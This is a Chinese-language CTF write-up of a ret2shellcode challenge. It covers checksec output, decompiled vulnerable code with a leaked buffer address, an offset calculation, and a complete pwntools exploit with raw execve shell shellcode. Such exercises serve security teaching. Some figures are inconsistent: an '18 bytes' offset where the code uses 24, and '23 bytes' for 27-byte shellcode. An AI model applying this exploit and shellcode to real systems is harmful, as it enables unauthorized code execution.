分析
题目下载
查看保护,ret2shellcode类型的题是没有NX保护的
┌──(root💀e267254b2ec9)-[/home/pwn]
└─# checksec shellcode
[*] '/home/pwn/shellcode'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments
从main中不难发现buf泄露了它的地址,并且存在栈溢出
int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 buf[2]; // [rsp+0h] [rbp-10h] BYREF
buf[0] = 0LL;
buf[1] = 0LL;
setvbuf(_bss_start, 0LL, 1, 0LL);
puts("Welcome to Sniperoj!");
printf("Do your kown what is it : [%p] ?\n", buf);
puts("Now give me your answer : ");
read(0, buf, 0x40uLL);
return 0;
}
思路
计算eip到buf的距离:断点到leave,算出buf到eip距离为rbp - rsp + 8 = 0x7fffde3d2820 - 0x7fffde3d2810 + 8 = 18 bytes
用shellcraft生成64位的shellcode是44字节的,大于了buf上到eip能填充的18个字节,因此,shellcode不能放在buf上,而是放在eip的后面,将eip的地址保存的值覆盖为eip后面的地址,后面就是填充shellcode了,足足有0x40 - 0x10 - 8 = 0x28 = 40个字节,同样也不能用shellcraft生成的,我们去网站上找一个短的
这些都行
https://www.exploit-db.com/shellcodes/43550
https://www.exploit-db.com/shellcodes/46907
EXP
# encoding: utf-8
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
if __name__ == '__main__':
p = process('./shellcode')
p.recvuntil('[')
buf_addr = p.recvuntil(']',drop=True)
fillw_addr = int(buf_addr,16) + 24 + 8
shellcode="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"# 23字节的shellcode
p.sendline(24*'a'+p64(fillw_addr)+shellcode)
p.interactive()
打通!
2442
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
